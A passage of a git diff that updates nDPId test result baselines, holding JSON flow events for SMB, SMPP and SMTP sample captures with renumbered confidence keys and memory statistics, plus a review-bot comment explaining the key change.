-01029{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7580000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7580000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +01029{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7580000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Vers","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":819,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492191036191} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871727 bytes -~~ total memory freed........: 5871727 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6005361 bytes +~~ total memory freed........: 6005361 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 1034 chars diff --git a/test/results/smpp_in_general.pcap.out b/test/results/smpp_in_general.pcap.out index 0186d5eca..fd51524c1 100644 --- a/test/results/smpp_in_general.pcap.out +++ b/test/results/smpp_in_general.pcap.out 
@@ -4,8 +4,8 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} 
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":200,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1217149884833} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871984 bytes -~~ total memory freed........: 5871984 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6005618 bytes +~~ total memory freed........: 6005618 bytes +~~ total allocations/frees...: 120894/120894 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 694 chars 
diff --git a/test/results/smtp-starttls.pcap.out b/test/results/smtp-starttls.pcap.out index 4a9b9aefb..23d838f39 100644 --- a/test/results/smtp-starttls.pcap.out +++ b/test/results/smtp-starttls.pcap.out 
@@ -4,9 +4,10 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"} 
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}} -00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":6011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1388017125239} 
+00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1388017124762,"flow_last_seen":1388017124864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1388017124864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"SMTPS.Google","breed":"Acceptable","category":"Email"}} 
+00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"SMTPS.Google","breed":"Acceptable","category":"Email"}} +00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":6011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1388017125239} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 36/36 ~~ skipped flows.............: 0 
@@ -15,10 +16,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870487 bytes -~~ total memory freed........: 5870487 bytes -~~ total allocations/frees...: 118150/118150 +~~ total memory allocated....: 6004127 bytes +~~ total memory freed........: 6004127 bytes +~~ total allocations/frees...: 120913/120913 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars -~~ json string max len.......: 691 chars -~~ json string avg len.......: 571 chars +~~ json string max len.......: 825 chars +~~ json string avg len.......: 632 chars diff --git a/test/results/smtp.pcap.out b/test/results/smtp.pcap.out index a462c5ea9..9a1943ea3 100644 --- a/test/results/smtp.pcap.out +++ b/test/results/smtp.pcap.out 
@@ -4,8 +4,8 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-payload-len":17955,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":934028408801} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874246 bytes -~~ total memory freed........: 5874246 bytes -~~ total allocations/frees...: 118210/118210 +~~ total memory allocated....: 6007880 bytes +~~ total memory freed........: 6007880 bytes +~~ total allocations/frees...: 120972/120972 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 680 chars diff --git a/test/results/smtps.pcapng.out b/test/results/smtps.pcapng.out index 7a62277c1..f285e555e 100644 
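Review bot: The key inside `"confidence"` changes from `"4"` to `"6"` for the same `"DPI"` result on the `detected` and `end` events in this hunk, and the same renumbering appears in the smtps.pcapng.out and snapchat.pcap.out hunks that follow. The key is presumably libnDPI's numeric confidence id, shifted by the bump; a consumer of these events that filters or alerts on the number rather than the name would silently stop matching, or match a different confidence level. These regenerated baselines are the only place on this page where the change is visible, so it is worth recording next to the event schema, for example `confidence: the numeric key is not stable across libnDPI versions; match on the name ("DPI")`. Nothing in the baseline itself needs to change.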
--- a/test/results/smtps.pcapng.out +++ b/test/results/smtps.pcapng.out 
@@ -4,8 +4,8 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938504972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938504972,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0\/aNAAEAGZc0+KyRjFUFfhJMyAdF0clasAAAAAIACFrAhIQAAAgQFhAEBBAIBAwMC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938505205,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938505205,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0AABAAC4GdXEVQV+EPiskYwHRkzJiRoeidHJWrYASchDbkQAAAgQFtAEBBAIBAwMH"} 01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938505342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1614938505342,"pkt":"AAAAAAAAAAEA\/khbCABFAAIt\/aVAAEAGY9I+KyRjFUFfhJMyAdF0clatYkaHo1AYBazqdwAAFgMBAgABAAH8AwO7S\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"} 
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00918{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
+00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 